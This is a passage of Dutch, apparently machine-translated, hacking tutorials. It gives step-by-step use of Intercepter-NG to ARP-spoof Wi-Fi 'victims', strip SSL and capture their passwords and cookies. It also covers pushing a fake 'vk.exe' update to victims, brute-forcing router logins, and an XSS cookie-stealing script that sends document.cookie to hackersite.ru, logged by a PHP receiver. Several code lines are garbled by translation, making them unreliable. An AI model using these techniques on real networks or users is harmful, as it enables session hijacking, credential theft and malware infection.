  6. Na het surfen op het web - het bezoeken van sociale netwerken, forums, chats, websites - verwijder de opgeslagen cookies en wis de browsercache.
  7. Update browsers en antivirussoftware regelmatig.
  8. Gebruik browserextensies die beschermen tegen XSS-aanvallen (bijvoorbeeld NoScript voor FF en Google Chrome).
  9. Periodiek in rekeningen.

En het allerbelangrijkste: verlies uw waakzaamheid en aandacht niet terwijl u ontspant of op internet werkt!

Hallo vrienden.

Zoals beloofd ga ik verder over het Intercepter-ng-programma.

Vandaag zal er een evaluatie plaatsvinden in de praktijk.

Waarschuwing: u moet geen instellingen wijzigen of gedachteloos op instellingen drukken. In het beste geval werkt het gewoon niet, anders schakel je wifi uit. Ik had een geval waarbij de routerinstellingen werden gereset. Denk dus niet dat alles onschadelijk is.

En zelfs met dezelfde instellingen als de mijne betekent dit niet dat alles soepel zal werken. In ieder geval zul je voor ernstige gevallen de werking van alle protocollen en modi moeten bestuderen.

Zullen we aan de slag gaan?

Onderschepping van cookies en wachtwoorden.

Laten we beginnen met de klassieke onderschepping van wachtwoorden en cookies. In principe is het proces hetzelfde als in het artikel over het onderscheppen van wachtwoorden via Wi-Fi en het onderscheppen van cookies via Wi-Fi, maar ik zal het opnieuw herschrijven, met verduidelijkingen.

Overigens kunnen antivirusprogramma's dergelijke dingen vaak activeren en het onderscheppen van gegevens via Wi-Fi voorkomen

Als het slachtoffer een Android- of iOS-apparaat gebruikt, kunt u alleen tevreden zijn met wat het slachtoffer alleen in de browser invoert (wachtwoorden, websites, cookies); als het slachtoffer een sociale client voor VK gebruikt, ontstaan ​​er eenvoudigweg problemen stoppen met werken. In de nieuwste versie van Intercepter NG kunt u het probleem oplossen door het certificaat van het slachtoffer te vervangen. Hierover later meer.

Bepaal eerst wat u van het slachtoffer moet krijgen? Misschien heb je wachtwoorden nodig voor sociale netwerken, of misschien alleen voor websites. Misschien zijn de cookies voldoende om als slachtoffer in te loggen en meteen iets te doen, of heeft u wachtwoorden nodig om deze in de toekomst te kunnen bewaren. Moet je de door het slachtoffer bekeken afbeeldingen en sommige pagina's verder analyseren, of heb je deze onzin niet nodig? Weet u dat het slachtoffer de site al heeft betreden (al geautoriseerd bij de overgang) of zal hij gewoon zijn gegevens invoeren?

Als het niet nodig is om afbeeldingen te ontvangen van de bronnen die u bezoekt, van delen van mediabestanden en van het zien van sommige sites die zijn opgeslagen in een HTML-bestand, schakel dit dan uit in Instellingen - Ressurection. Dit zal de belasting van de router enigszins verminderen.

Wat kan worden geactiveerd in Instellingen - als u verbonden bent via een ethernetkabel, moet u Spoof Ip/mac activeren. Activeer ook de Cookie-killer (helpt cookies te resetten zodat het slachtoffer de site kan verlaten). Cookie killer is een SSL Strip Attack, dus vergeet niet deze te activeren.

Het is ook beter als de Promiscious-modus is geactiveerd, waardoor je de onderschepping kunt verbeteren, maar niet alle modules ondersteunen dit... De Extreme-modus kan ook zonder. Daarmee worden soms meer poorten onderschept, maar is er ook extra informatie + laden...

Selecteer eerst bovenaan de interface waarmee u met internet bent verbonden en het verbindingstype: Wi-Fi of Ethernet indien via een kabel verbonden met de router.

Klik in de scanmodus met de rechtermuisknop op een leeg veld en klik op Slimme scan. Alle apparaten op het netwerk worden gescand; het enige dat overblijft is het toevoegen van de gewenste slachtoffers aan Add nat.

Of u kunt elk IP-adres instellen, naar instellingen gaan - expertmodus en het vakje voor Auto ARP-gif aanvinken, in dit geval zal het programma iedereen toevoegen die verbonden is en verbinding maken met het netwerk.

Het enige wat we hoeven te doen is overschakelen naar de Nat-modus.

Klik op configure mitms , hier hebben we SSL mitm en SSL-strip nodig.

SSL-mitm Hiermee kunt u gegevens onderscheppen, hoewel veel browsers hierop reageren door het slachtoffer te waarschuwen.

SSL-strip Hiermee kan het slachtoffer overschakelen van het beveiligde Https-protocol naar HTTP, en kan de cookie-killer werken.

We hebben niets anders nodig, klik op start arp gif (stralingspictogram) en wacht op de activiteit van het slachtoffer.

Klik met de rechtermuisknop in het gedeelte Wachtwoordmodus en Toon koelies. Vervolgens kunt u met de rechtermuisknop op de cookie klikken en naar de volledige url gaan.

Trouwens, als het slachtoffer zich op sociale netwerken bevindt, bestaat de kans dat zijn actieve correspondentie in de Messenger-modus verschijnt.

Http-injectie (stuur een bestand naar het slachtoffer).

Mmm, best een leuke optie.

U kunt het aan het slachtoffer doorgeven, zodat zij het bestand downloadt. We kunnen alleen maar hopen dat het slachtoffer het bestand zal starten. Voor de plausibiliteit kunt u analyseren welke sites het slachtoffer bezoekt en zoiets als een update versturen.

Als het slachtoffer bijvoorbeeld VK gebruikt, noem dan het bestand vk.exe. Misschien zal het slachtoffer het lanceren en besluiten dat het nuttig is.

Laten we beginnen.


Bruteforce-modus.

Brute force- en wachtwoordraadmodus.

Een van de manieren om het te gebruiken is door brute force-toegang tot het beheerderspaneel van de router. Ook enkele andere protocollen.

Voor Brutus heb je nodig

Voer in de Doelserver het IP-adres van de router, het Telnet-protocol, de gebruikersnaam en de gebruikersnaam in, in ons geval Admin.

Onderaan staat een knop met een map erop getekend, je klikt erop en opent een lijst met wachtwoorden (in de map met het programma, misc/pwlist.txt, staat een lijst met veelgebruikte wachtwoorden, of je kunt deze gebruiken je eigen lijst).

Druk na het laden op start (driehoekje) en ga thee drinken.

Als er overeenkomsten zijn (er is een wachtwoord geselecteerd), stopt het programma.

U moet de gebruikersnaam weten. Maar als je toegang wilt tot de router, probeer dan de standaard - admin.

Hoe bruut te produceren.

Verkeerswisselaar (verkeerssubstitutie).

De functie is meer een grap. U kunt dit zo wijzigen dat het slachtoffer bij het betreden van de ene site naar een andere gaat die u betreedt.

Voer in de verkeersmodus het verzoek aan de linkerkant in en het resultaat aan de rechterkant, maar met hetzelfde aantal letters en symbolen, anders werkt het niet.

Voorbeeld: aan de linkerkant voeren we de vraag in die moet worden gewijzigd, aan de rechterkant veranderen we test1 in test2. (vink het vakje aan voor Schakel HTTP gzip uit).

Druk na het invoeren op TOEVOEGEN en vervolgens op OK.

Tenslotte een video over hoe je gegevens van iOS-clients kunt onderscheppen, want zoals je weet, stoppen hun applicaties tijdens een Mitm-aanval gewoon met werken.

Ik zal binnenkort een video maken over wat er in het artikel staat.

Het was het onderscheppen van gegevens via wifi.

Dat is eigenlijk alles. Als je iets toe te voegen hebt, schrijf dan, als je iets te corrigeren hebt, schrijf dan gewoon.

Tot de volgende keer.

Wat is een koekje?

Er is een mechanisme waarmee de http-server tekstinformatie op de computer van de gebruiker kan opslaan en er vervolgens toegang toe kan krijgen. Deze informatie wordt een cookie genoemd. In wezen is elke cookie een paar: de naam van een parameter en de waarde ervan. Aan elke cookie wordt ook het domein toegewezen waartoe deze behoort. Om veiligheidsredenen heeft de http-server in alle browsers alleen toegang tot de cookie van zijn domein. Bovendien kunnen cookies een vervaldatum hebben. In dat geval blijven ze tot deze datum op de computer opgeslagen, zelfs als u alle browservensters sluit.


Waarom zijn cookies belangrijk?

Alle multi-user systemen gebruiken cookies om de gebruiker te identificeren. Meer precies: de huidige verbinding van de gebruiker met de dienst, gebruikerssessie. Als iemand uw cookies herkent, kan hij of zij namens u inloggen op het systeem. Omdat momenteel maar heel weinig internetbronnen tijdens één gebruikerssessie controleren op IP-adreswijzigingen.


Hoe cookies wijzigen of vervangen?

Browserontwikkelaars bieden geen ingebouwde tools voor het bewerken van cookies. Maar je kunt wel rondkomen met een gewoon notitieblok.


Stap 1: maak een tekstbestand met tekst

Windows Register-editor versie 5.00



@="C:\\IE_ext.htm"

Sla het op onder de naam IE_ext.reg

Stap 2: Voeg met behulp van het gemaakte bestand wijzigingen toe aan het Windows-register.

Stap 3: maak een tekstbestand met tekst

< script taal = "javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

extern.menuArgumenten.document.cookie= "testnaam=testwaarde; pad=/; domein=testdomein.ru";
alert(extern.menuArgumenten.document.cookie);


Sla het op onder de naam C:\IE_ext.htm

Stap 4: We gaan naar de website waarin we geïnteresseerd zijn.

Stap 5: Klik met de rechtermuisknop op een lege ruimte op de pagina en selecteer het menu-item "Werken met cookies". Geef toegang tot het klembord. Uw cookies van deze site gaan naar het klembord. Je kunt hun notitieblok erin steken en een kijkje nemen.


Stap 6: Om sommige cookies te wijzigen, bewerkt u het bestand C:\IE_ext.htm, vervangend testnaam in naam van het koekje, testwaarde- over de betekenis ervan, testdomein.ru– naar het sitedomein. Voeg indien nodig meer vergelijkbare regels toe. Voor het gemak van de controle heb ik aan het script de uitvoer van de huidige cookies voor en na de wijziging toegevoegd: alert(extern.menuArgumenten.document.cookie);

Stap 7: Voer stap 5 opnieuw uit en vernieuw vervolgens de pagina.

Kort gezegd: we hebben toegang tot deze internetbron met bijgewerkte cookies.

Hoe cookies stelen met JavaScript?

Als een aanvaller een mogelijkheid weet te vinden om een ​​willekeurig JavaScript-script uit te voeren op de computer van het slachtoffer, dan kan hij de huidige cookies heel gemakkelijk uitlezen. Voorbeeld:


var str= document.cookie;

Maar zal hij ze naar zijn site kunnen overbrengen, omdat, zoals ik eerder heb opgemerkt, een JavaScript-script zonder aanvullende bevestiging geen toegang kan krijgen tot een site die zich op een ander domein bevindt? Het blijkt dat een JavaScript-script elke afbeelding op elke http-server kan laden. Breng tegelijkertijd eventuele tekstinformatie in het downloadverzoek over naar deze afbeelding. Voorbeeld: http://hackersite.ru/xss.jpg?text_info Dus als je deze code uitvoert:

var img= nieuwe afbeelding();

img.src= "http://hackersite.ru/xss.jpg?"+ codeURI(document.cookie);


dan komt de cookie terecht in het verzoek om de “foto” te downloaden en “gaat” naar de aanvaller.

Hoe omgaan met dergelijke verzoeken om een ​​“afbeelding” te downloaden?

Een aanvaller hoeft alleen maar een hosting met PHP-ondersteuning te vinden en daar de volgende code te plaatsen:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fsluiten($fp);
?>

Vervolgens worden alle aanvraagparameters voor dit script in het bestand opgeslagen log.txt. Het enige dat overblijft is het vervangen in het eerder beschreven JavaScript-script http://hackersite.ru/xss.jpg naar het pad naar dit php-script.


Kortom

Ik heb alleen de eenvoudigste manier laten zien om XSS-kwetsbaarheden te misbruiken. Maar dit bewijst dat de aanwezigheid van minstens één dergelijke kwetsbaarheid op een internetsite voor meerdere gebruikers een aanvaller in staat kan stellen de bronnen namens u te gebruiken.